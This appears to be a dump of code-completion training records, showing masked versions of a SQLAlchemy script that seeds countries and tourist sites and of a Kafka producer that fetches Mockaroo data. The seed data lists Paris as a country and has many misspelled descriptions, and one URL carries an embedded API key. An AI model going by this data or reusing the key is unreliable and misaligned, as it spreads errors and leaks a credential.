"blob_id": "a159f9f9cc06bb9d22f84781fb2fc664ea204b64",
"index": 6856,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n for i in range(10):\n print('here %s' % i)\n time.sleep(1)\n print('TEST SUCEEDED')\n",
"step-3": "import time\nif __name__ == '__main__':\n for i in range(10):\n print('here %s' % i)\n time.sleep(1)\n print('TEST SUCEEDED')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
session.add(user_1)
session.commit()
<|reserved_special_token_0|>
session.add(country_1)
session.commit()
<|reserved_special_token_0|>
session.add(country_2)
session.commit()
<|reserved_special_token_0|>
session.add(country_3)
session.commit()
<|reserved_special_token_0|>
session.add(country_4)
session.commit()
<|reserved_special_token_0|>
session.add(country_5)
session.commit()
<|reserved_special_token_0|>
session.add(country_6)
session.commit()
<|reserved_special_token_0|>
session.add(country_7)
session.commit()
<|reserved_special_token_0|>
session.add(country_8)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
<|reserved_special_token_0|>
session.add(places)
session.commit()
print('added countries and Tourist Places added')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
engine = create_engine('sqlite:///country_catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
user_1 = Users(name='admin', email='admin@admin.com')
session.add(user_1)
session.commit()
country_1 = Country(user_id=1, name='India')
session.add(country_1)
session.commit()
country_2 = Country(user_id=1, name='Australia')
session.add(country_2)
session.commit()
country_3 = Country(user_id=1, name='England')
session.add(country_3)
session.commit()
country_4 = Country(user_id=1, name='Paris')
session.add(country_4)
session.commit()
country_5 = Country(user_id=1, name='USA')
session.add(country_5)
session.commit()
country_6 = Country(user_id=1, name='Mexico')
session.add(country_6)
session.commit()
country_7 = Country(user_id=1, name='Srilanka')
session.add(country_7)
session.commit()
country_8 = Country(user_id=1, name='Maldives')
session.add(country_8)
session.commit()
places = TouristPlaces(user_id=1, name='Taj Mahal', description=
'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel'
, country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Red Fort', description=
'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.'
, country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Canberra', description=
'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites'
, country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Perth', description=
'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean'
, country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Tower Of London', description=
'It is one of the world Heritage siteOther highlights are Crown Jewels Exhibition'
, country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='British Museum', description=
'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles'
, country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Eiffel Tower', description=
'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel'
, country=country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='places of Versallies', description=
'The Palce of Versallies is the Principle Royalresidence.', country=
country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Grand Canyon Village', description=
'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon'
, country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Statue if Liberty', description=
'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork'
, country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Mexico City', description=
'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.'
, country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Tulum', description=
'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city'
, country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Colombo', description=
'It is the Capital city of SrilankaIt sheritage is reflected in its Architecture'
, country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Kandy', description=
'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.'
, country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Male', description=
'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year'
, country=country_8)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Sun Island', description=
'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists'
, country=country_8)
session.add(places)
session.commit()
print('added countries and Tourist Places added')
<|reserved_special_token_1|>
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Country, TouristPlaces, Users
engine = create_engine('sqlite:///country_catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
user_1 = Users(name='admin', email='admin@admin.com')
session.add(user_1)
session.commit()
country_1 = Country(user_id=1, name='India')
session.add(country_1)
session.commit()
country_2 = Country(user_id=1, name='Australia')
session.add(country_2)
session.commit()
country_3 = Country(user_id=1, name='England')
session.add(country_3)
session.commit()
country_4 = Country(user_id=1, name='Paris')
session.add(country_4)
session.commit()
country_5 = Country(user_id=1, name='USA')
session.add(country_5)
session.commit()
country_6 = Country(user_id=1, name='Mexico')
session.add(country_6)
session.commit()
country_7 = Country(user_id=1, name='Srilanka')
session.add(country_7)
session.commit()
country_8 = Country(user_id=1, name='Maldives')
session.add(country_8)
session.commit()
places = TouristPlaces(user_id=1, name='Taj Mahal', description=
'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel'
, country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Red Fort', description=
'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.'
, country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Canberra', description=
'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites'
, country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Perth', description=
'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean'
, country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Tower Of London', description=
'It is one of the world Heritage siteOther highlights are Crown Jewels Exhibition'
, country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='British Museum', description=
'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles'
, country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Eiffel Tower', description=
'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel'
, country=country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='places of Versallies', description=
'The Palce of Versallies is the Principle Royalresidence.', country=
country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Grand Canyon Village', description=
'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon'
, country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Statue if Liberty', description=
'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork'
, country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Mexico City', description=
'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.'
, country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Tulum', description=
'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city'
, country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Colombo', description=
'It is the Capital city of SrilankaIt sheritage is reflected in its Architecture'
, country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Kandy', description=
'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.'
, country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Male', description=
'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year'
, country=country_8)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name='Sun Island', description=
'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists'
, country=country_8)
session.add(places)
session.commit()
print('added countries and Tourist Places added')
<|reserved_special_token_1|>
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Country, TouristPlaces, Users
# Create database and create a shortcut for easier to update database
engine = create_engine('sqlite:///country_catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Creating an user
user_1 = Users(name="admin", email="admin@admin.com")
session.add(user_1)
session.commit()
# India
country_1 = Country(user_id=1, name="India")
session.add(country_1)
session.commit()
# Australia
country_2 = Country(user_id=1, name="Australia")
session.add(country_2)
session.commit()
# England
country_3 = Country(user_id=1, name="England")
session.add(country_3)
session.commit()
# Paris
country_4 = Country(user_id=1, name="Paris")
session.add(country_4)
session.commit()
# USA
country_5 = Country(user_id=1, name="USA")
session.add(country_5)
session.commit()
# Mexico
country_6 = Country(user_id=1, name="Mexico")
session.add(country_6)
session.commit()
# SriLanka
country_7 = Country(user_id=1, name="Srilanka")
session.add(country_7)
session.commit()
# MAldives
country_8 = Country(user_id=1, name="Maldives")
session.add(country_8)
session.commit()
# Adding touristAttractions to Countries
places = TouristPlaces(user_id=1, name="Taj Mahal",
description="Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal "
"It is bultby using white marbel",
country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Red Fort",
description="Red fort is the histroric fort in the city of Delhi,India."
"It is the main residence of the emperors of mughal Dynasty.",
country=country_1)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Canberra",
description="It is the home for National GAllery of Australia"
"and a wide varierty of cultural and historic sites",
country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Perth",
description="The west side ofAustralia is home to the city of Perth"
"It is bordered by Indian Ocean",
country=country_2)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Tower Of London",
description="It is one of the world Heritage site"
"Other highlights are Crown Jewels Exhibition",
country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="British Museum",
description="It contains the collection of worlds finest antiquites"
"The famous artifacts are Eglin marbles",
country=country_3)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Eiffel Tower",
description="The Eiffel-tower is wrought iron lattice"
"It is named after the Engineer Gustav Eiffel",
country=country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="places of Versallies",
description="The Palce of Versallies is the Principle Royal"
"residence.",
country=country_4)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Grand Canyon Village",
description="Grand Canyon is located in south Rim of Grand Canyon"
"It is focussed on accomadating tourists visiting Grand Canyon",
country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Statue if Liberty",
description="Statue of Liberty is Colossal neo-classical sculpture"
"In New-york Hourbor Newyork",
country=country_5)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Mexico City",
description="Mexico city is densely populated and high altitude capital Of Mexico"
"It is the home for zoo,Muesuem of modern Art.",
country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Tulum",
description="Tulum is a town in the Carribean coatline of Mexico"
"It is well-known for beaches and ruins of Ancient Mayan port city",
country=country_6)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Colombo",
description="It is the Capital city of Srilanka"
"It sheritage is reflected in its Architecture",
country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Kandy",
description="Kandy is the largest city of central Sri Lanka."
"It is surrounded by mountains which is home to tea Plantations.",
country=country_7)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Male",
description="It is among the tooped tourist Attractions of Maldives"
"It has considerably moderate tempaerature through out the year",
country=country_8)
session.add(places)
session.commit()
places = TouristPlaces(user_id=1, name="Sun Island",
description="It is adorned with some sparkling beaches"
"beuatigul flowers and lavish greenary that pulls a great number of tourists",
country=country_8)
session.add(places)
session.commit()
print("added countries and Tourist Places added")
|
flexible
|
{
"blob_id": "21b9844fce10d16a14050a782ce7e15e3f6fb657",
"index": 5737,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsession.add(user_1)\nsession.commit()\n<mask token>\nsession.add(country_1)\nsession.commit()\n<mask token>\nsession.add(country_2)\nsession.commit()\n<mask token>\nsession.add(country_3)\nsession.commit()\n<mask token>\nsession.add(country_4)\nsession.commit()\n<mask token>\nsession.add(country_5)\nsession.commit()\n<mask token>\nsession.add(country_6)\nsession.commit()\n<mask token>\nsession.add(country_7)\nsession.commit()\n<mask token>\nsession.add(country_8)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\n<mask token>\nsession.add(places)\nsession.commit()\nprint('added countries and Tourist Places added')\n",
"step-3": "<mask token>\nengine = create_engine('sqlite:///country_catalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nuser_1 = Users(name='admin', email='admin@admin.com')\nsession.add(user_1)\nsession.commit()\ncountry_1 = Country(user_id=1, name='India')\nsession.add(country_1)\nsession.commit()\ncountry_2 = Country(user_id=1, name='Australia')\nsession.add(country_2)\nsession.commit()\ncountry_3 = Country(user_id=1, name='England')\nsession.add(country_3)\nsession.commit()\ncountry_4 = Country(user_id=1, name='Paris')\nsession.add(country_4)\nsession.commit()\ncountry_5 = Country(user_id=1, name='USA')\nsession.add(country_5)\nsession.commit()\ncountry_6 = Country(user_id=1, name='Mexico')\nsession.add(country_6)\nsession.commit()\ncountry_7 = Country(user_id=1, name='Srilanka')\nsession.add(country_7)\nsession.commit()\ncountry_8 = Country(user_id=1, name='Maldives')\nsession.add(country_8)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Taj Mahal', description=\n 'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Red Fort', description=\n 'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Canberra', description=\n 'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites'\n , country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Perth', description=\n 'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean'\n , country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tower Of London', description=\n 'It is one of the world Heritage siteOther highlights are Crown Jewels Exhibition'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='British Museum', description=\n 'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Eiffel Tower', description=\n 'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel'\n , country=country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='places of Versallies', description=\n 'The Palce of Versallies is the Principle Royalresidence.', country=\n country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Grand Canyon Village', description=\n 'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Statue if Liberty', description=\n 'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Mexico City', description=\n 'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tulum', description=\n 'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Colombo', description=\n 'It is the Capital city of SrilankaIt sheritage is reflected in its Architecture'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Kandy', description=\n 'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Male', description=\n 'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year'\n , country=country_8)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Sun Island', description=\n 'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists'\n , country=country_8)\nsession.add(places)\nsession.commit()\nprint('added countries and Tourist Places added')\n",
"step-4": "from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Country, TouristPlaces, Users\nengine = create_engine('sqlite:///country_catalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nuser_1 = Users(name='admin', email='admin@admin.com')\nsession.add(user_1)\nsession.commit()\ncountry_1 = Country(user_id=1, name='India')\nsession.add(country_1)\nsession.commit()\ncountry_2 = Country(user_id=1, name='Australia')\nsession.add(country_2)\nsession.commit()\ncountry_3 = Country(user_id=1, name='England')\nsession.add(country_3)\nsession.commit()\ncountry_4 = Country(user_id=1, name='Paris')\nsession.add(country_4)\nsession.commit()\ncountry_5 = Country(user_id=1, name='USA')\nsession.add(country_5)\nsession.commit()\ncountry_6 = Country(user_id=1, name='Mexico')\nsession.add(country_6)\nsession.commit()\ncountry_7 = Country(user_id=1, name='Srilanka')\nsession.add(country_7)\nsession.commit()\ncountry_8 = Country(user_id=1, name='Maldives')\nsession.add(country_8)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Taj Mahal', description=\n 'Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal It is bultby using white marbel'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Red Fort', description=\n 'Red fort is the histroric fort in the city of Delhi,India.It is the main residence of the emperors of mughal Dynasty.'\n , country=country_1)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Canberra', description=\n 'It is the home for National GAllery of Australiaand a wide varierty of cultural and historic sites'\n , country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Perth', description=\n 'The west side ofAustralia is home to the city of PerthIt is bordered by Indian Ocean'\n , country=country_2)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tower Of London', description=\n 'It is one of the world Heritage siteOther highlights are Crown Jewels Exhibition'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='British Museum', description=\n 'It contains the collection of worlds finest antiquitesThe famous artifacts are Eglin marbles'\n , country=country_3)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Eiffel Tower', description=\n 'The Eiffel-tower is wrought iron latticeIt is named after the Engineer Gustav Eiffel'\n , country=country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='places of Versallies', description=\n 'The Palce of Versallies is the Principle Royalresidence.', country=\n country_4)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Grand Canyon Village', description=\n 'Grand Canyon is located in south Rim of Grand CanyonIt is focussed on accomadating tourists visiting Grand Canyon'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Statue if Liberty', description=\n 'Statue of Liberty is Colossal neo-classical sculptureIn New-york Hourbor Newyork'\n , country=country_5)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Mexico City', description=\n 'Mexico city is densely populated and high altitude capital Of MexicoIt is the home for zoo,Muesuem of modern Art.'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Tulum', description=\n 'Tulum is a town in the Carribean coatline of MexicoIt is well-known for beaches and ruins of Ancient Mayan port city'\n , country=country_6)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Colombo', description=\n 'It is the Capital city of SrilankaIt sheritage is reflected in its Architecture'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Kandy', description=\n 'Kandy is the largest city of central Sri Lanka.It is surrounded by mountains which is home to tea Plantations.'\n , country=country_7)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Male', description=\n 'It is among the tooped tourist Attractions of MaldivesIt has considerably moderate tempaerature through out the year'\n , country=country_8)\nsession.add(places)\nsession.commit()\nplaces = TouristPlaces(user_id=1, name='Sun Island', description=\n 'It is adorned with some sparkling beachesbeuatigul flowers and lavish greenary that pulls a great number of tourists'\n , country=country_8)\nsession.add(places)\nsession.commit()\nprint('added countries and Tourist Places added')\n",
"step-5": "from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Country, TouristPlaces, Users\n\n# Create database and create a shortcut for easier to update database\nengine = create_engine('sqlite:///country_catalog.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Creating an user\nuser_1 = Users(name=\"admin\", email=\"admin@admin.com\")\nsession.add(user_1)\nsession.commit()\n\n# India\ncountry_1 = Country(user_id=1, name=\"India\")\nsession.add(country_1)\nsession.commit()\n\n\n# Australia\ncountry_2 = Country(user_id=1, name=\"Australia\")\nsession.add(country_2)\nsession.commit()\n\n# England\ncountry_3 = Country(user_id=1, name=\"England\")\nsession.add(country_3)\nsession.commit()\n\n# Paris\ncountry_4 = Country(user_id=1, name=\"Paris\")\nsession.add(country_4)\nsession.commit()\n\n# USA\ncountry_5 = Country(user_id=1, name=\"USA\")\nsession.add(country_5)\nsession.commit()\n\n# Mexico\ncountry_6 = Country(user_id=1, name=\"Mexico\")\nsession.add(country_6)\nsession.commit()\n\n# SriLanka\ncountry_7 = Country(user_id=1, name=\"Srilanka\")\nsession.add(country_7)\nsession.commit()\n\n# MAldives\ncountry_8 = Country(user_id=1, name=\"Maldives\")\nsession.add(country_8)\nsession.commit()\n\n# Adding touristAttractions to Countries\nplaces = TouristPlaces(user_id=1, name=\"Taj Mahal\",\n description=\"Taj Mahal is mausolem by Mughal ruler Shah Jahan for his Wife Mumtaz Mahal \"\n \"It is bultby using white marbel\",\n country=country_1)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Red Fort\",\n description=\"Red fort is the histroric fort in the city of Delhi,India.\"\n \"It is the main residence of the emperors of mughal Dynasty.\",\n country=country_1)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Canberra\",\n description=\"It is the home for National GAllery of Australia\"\n \"and a wide varierty of cultural and historic sites\",\n country=country_2)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Perth\",\n description=\"The west side ofAustralia is home to the city of Perth\"\n \"It is bordered by Indian Ocean\",\n country=country_2)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Tower Of London\",\n description=\"It is one of the world Heritage site\"\n \"Other highlights are Crown Jewels Exhibition\",\n country=country_3)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"British Museum\",\n description=\"It contains the collection of worlds finest antiquites\"\n \"The famous artifacts are Eglin marbles\",\n country=country_3)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Eiffel Tower\",\n description=\"The Eiffel-tower is wrought iron lattice\"\n \"It is named after the Engineer Gustav Eiffel\",\n country=country_4)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"places of Versallies\",\n description=\"The Palce of Versallies is the Principle Royal\"\n \"residence.\",\n country=country_4)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Grand Canyon Village\",\n description=\"Grand Canyon is located in south Rim of Grand Canyon\"\n \"It is focussed on accomadating tourists visiting Grand Canyon\",\n country=country_5)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Statue if Liberty\",\n description=\"Statue of Liberty is Colossal neo-classical sculpture\"\n \"In New-york Hourbor Newyork\",\n country=country_5)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Mexico City\",\n description=\"Mexico city is densely populated and high altitude capital Of Mexico\"\n \"It is the home for zoo,Muesuem of modern Art.\",\n country=country_6)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Tulum\",\n description=\"Tulum is a town in the Carribean coatline of Mexico\"\n \"It is well-known for beaches and ruins of Ancient Mayan port city\",\n country=country_6)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Colombo\",\n description=\"It is the Capital city of Srilanka\"\n \"It sheritage is reflected in its Architecture\",\n country=country_7)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Kandy\",\n description=\"Kandy is the largest city of central Sri Lanka.\"\n \"It is surrounded by mountains which is home to tea Plantations.\",\n country=country_7)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Male\",\n description=\"It is among the tooped tourist Attractions of Maldives\"\n \"It has considerably moderate tempaerature through out the year\",\n country=country_8)\nsession.add(places)\nsession.commit()\n\nplaces = TouristPlaces(user_id=1, name=\"Sun Island\",\n description=\"It is adorned with some sparkling beaches\"\n \"beuatigul flowers and lavish greenary that pulls a great number of tourists\",\n country=country_8)\nsession.add(places)\nsession.commit()\n\nprint(\"added countries and Tourist Places added\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import requests
#!/usr/bin/env python
from confluent_kafka import Producer, KafkaError
import json
import ccloud_lib
delivered_records = 0
url = "https://api.mockaroo.com/api/cbb61270?count=1000&key=5a40bdb0"
# Optional per-message on_delivery handler (triggered by poll() or flush())
# when a message has been successfully delivered or
# permanently failed delivery (after retries).
def acked(err, msg):
global delivered_records
"""Delivery report handler called on
successful or failed delivery of message
"""
if err is not None:
print("Failed to deliver message: {}".format(err))
else:
delivered_records += 1
print("Produced record to topic {} partition [{}] @ offset {}"
.format(msg.topic(), msg.partition(), msg.offset()))
#get mockaroo data records
#make sure mockaroo schema is set to output array
def get_data():
r = requests.get(url)
return '{ "data": ' + str(r.text) + '}'
def main():
# Read arguments and configurations and initialize
args = ccloud_lib.parse_args()
config_file = args.config_file
topic = args.topic
conf = ccloud_lib.read_ccloud_config(config_file)
# Create Producer instance
producer_conf = ccloud_lib.pop_schema_registry_params_from_config(conf)
producer = Producer(producer_conf)
# Create topic if needed
ccloud_lib.create_topic(conf, topic)
print("hello world")
d = get_data()
djson = json.loads(d)
darray = djson['data']
for item in darray:
record_key = str(item['_id'])
record_value = json.dumps(item)
print(record_value)
producer.produce(topic, key=record_key, value=record_value, on_delivery=acked)
producer.poll(0)
producer.flush()
print("{} messages were produced to topic {}!".format(delivered_records, topic))
if __name__ == '__main__':
main()
# to run program
# python user_purchases_to_kafka.py -f ~/.confluent/python.config -t user_purchases
# python user_activity_to_kafka.py -f ~/.confluent/python.config -t user_activity
|
normal
|
{
"blob_id": "b4f522398cd2658c2db926216e974781e10c44df",
"index": 7897,
